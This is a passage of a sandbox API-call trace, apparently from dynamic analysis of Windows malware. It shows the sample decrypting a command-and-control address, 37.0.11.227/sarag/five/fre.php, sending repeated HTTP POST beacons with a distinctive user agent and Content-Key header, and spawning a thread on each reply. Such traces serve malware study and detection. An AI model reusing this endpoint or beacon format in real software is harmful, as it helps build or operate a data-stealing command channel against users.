ppResult=0x19fcd8*=0x0) returned 11001 [0260.051] GetProcessHeap () returned 0x690000 [0260.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0260.052] GetProcessHeap () returned 0x690000 [0260.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0260.052] GetProcessHeap () returned 0x690000 [0260.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0260.053] GetProcessHeap () returned 0x690000 [0260.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0260.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.055] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0260.075] GetProcessHeap () returned 0x690000 [0260.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0260.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.076] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0260.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.078] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.081] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.081] GetProcessHeap () returned 0x690000 [0260.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0260.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.083] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0260.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.086] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0260.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.088] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0260.088] GetProcessHeap () returned 0x690000 [0260.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0260.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.096] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0260.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.097] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0260.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.099] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0260.099] GetProcessHeap () returned 0x690000 [0260.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0260.099] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0260.099] GetProcessHeap () returned 0x690000 [0260.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0260.099] socket (af=2, type=1, protocol=6) returned 0x784 [0260.100] connect (s=0x784, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0260.122] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0260.122] GetProcessHeap () returned 0x690000 [0260.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0260.122] GetProcessHeap () returned 0x690000 [0260.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0260.124] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.125] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.126] GetProcessHeap () returned 0x690000 [0260.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0260.126] GetProcessHeap () returned 0x690000 [0260.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.126] GetProcessHeap () returned 0x690000 [0260.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0260.126] GetProcessHeap () returned 0x690000 [0260.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0260.127] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.129] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.129] GetProcessHeap () returned 0x690000 [0260.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0260.129] GetProcessHeap () returned 0x690000 [0260.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.129] send (s=0x784, buf=0x6ad508*, len=242, flags=0) returned 242 [0260.131] send (s=0x784, buf=0x6aba40*, len=159, flags=0) returned 159 [0260.132] GetProcessHeap () returned 0x690000 [0260.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0260.132] recv (in: s=0x784, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0260.194] GetProcessHeap () returned 0x690000 [0260.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0260.194] GetProcessHeap () returned 0x690000 [0260.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0260.195] GetProcessHeap () returned 0x690000 [0260.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0260.195] GetProcessHeap () returned 0x690000 [0260.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0260.196] closesocket (s=0x784) returned 0 [0260.197] GetProcessHeap () returned 0x690000 [0260.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0260.197] GetProcessHeap () returned 0x690000 [0260.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0260.198] GetProcessHeap () returned 0x690000 [0260.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0260.198] GetProcessHeap () returned 0x690000 [0260.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0260.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x152c) returned 0x784 [0260.201] Sleep (dwMilliseconds=0xea60) [0260.203] GetProcessHeap () returned 0x690000 [0260.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0260.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0260.234] GetProcessHeap () returned 0x690000 [0260.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0260.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.236] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0260.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.248] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.250] GetProcessHeap () returned 0x690000 [0260.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0260.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.257] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0260.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.259] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0260.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.261] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0260.261] GetProcessHeap () returned 0x690000 [0260.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.263] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.269] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.271] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.323] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.332] GetProcessHeap () returned 0x690000 [0260.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0260.351] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.361] GetProcessHeap () returned 0x690000 [0260.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0260.362] GetProcessHeap () returned 0x690000 [0260.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0260.362] GetProcessHeap () returned 0x690000 [0260.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0260.363] GetProcessHeap () returned 0x690000 [0260.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0260.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.365] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0260.466] GetProcessHeap () returned 0x690000 [0260.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0260.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.469] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0260.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.479] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.479] GetProcessHeap () returned 0x690000 [0260.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0260.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.500] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0260.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.502] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0260.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.522] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0260.522] GetProcessHeap () returned 0x690000 [0260.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.523] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0260.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.525] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0260.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.527] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0260.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.531] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0260.531] GetProcessHeap () returned 0x690000 [0260.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0260.531] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0260.531] GetProcessHeap () returned 0x690000 [0260.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0260.531] socket (af=2, type=1, protocol=6) returned 0x788 [0260.532] connect (s=0x788, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0260.556] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0260.556] GetProcessHeap () returned 0x690000 [0260.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0260.556] GetProcessHeap () returned 0x690000 [0260.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0260.557] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.559] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.559] GetProcessHeap () returned 0x690000 [0260.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0260.559] GetProcessHeap () returned 0x690000 [0260.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.560] GetProcessHeap () returned 0x690000 [0260.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0260.560] GetProcessHeap () returned 0x690000 [0260.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0260.562] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.564] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.565] GetProcessHeap () returned 0x690000 [0260.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0260.565] GetProcessHeap () returned 0x690000 [0260.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.566] send (s=0x788, buf=0x6ad508*, len=242, flags=0) returned 242 [0260.567] send (s=0x788, buf=0x6aba40*, len=159, flags=0) returned 159 [0260.567] GetProcessHeap () returned 0x690000 [0260.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0260.567] recv (in: s=0x788, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0260.733] GetProcessHeap () returned 0x690000 [0260.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0260.734] GetProcessHeap () returned 0x690000 [0260.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0260.734] GetProcessHeap () returned 0x690000 [0260.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0260.738] GetProcessHeap () returned 0x690000 [0260.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0260.739] closesocket (s=0x788) returned 0 [0260.739] GetProcessHeap () returned 0x690000 [0260.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0260.739] GetProcessHeap () returned 0x690000 [0260.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0260.740] GetProcessHeap () returned 0x690000 [0260.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0260.740] GetProcessHeap () returned 0x690000 [0260.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0260.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1530) returned 0x788 [0260.794] Sleep (dwMilliseconds=0xea60) [0260.811] GetProcessHeap () returned 0x690000 [0260.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0260.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.813] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0260.855] GetProcessHeap () returned 0x690000 [0260.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0260.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.857] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0260.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.859] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.860] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.860] GetProcessHeap () returned 0x690000 [0260.864] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0260.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.870] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0260.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.871] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0260.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.872] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0260.872] GetProcessHeap () returned 0x690000 [0260.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.875] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.880] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.882] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.883] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.883] GetProcessHeap () returned 0x690000 [0260.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0260.883] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.883] GetProcessHeap () returned 0x690000 [0260.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0260.884] GetProcessHeap () returned 0x690000 [0260.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0260.884] GetProcessHeap () returned 0x690000 [0260.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0260.885] GetProcessHeap () returned 0x690000 [0260.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0260.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.886] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0260.902] GetProcessHeap () returned 0x690000 [0260.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0260.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.903] CryptImportKey (in: 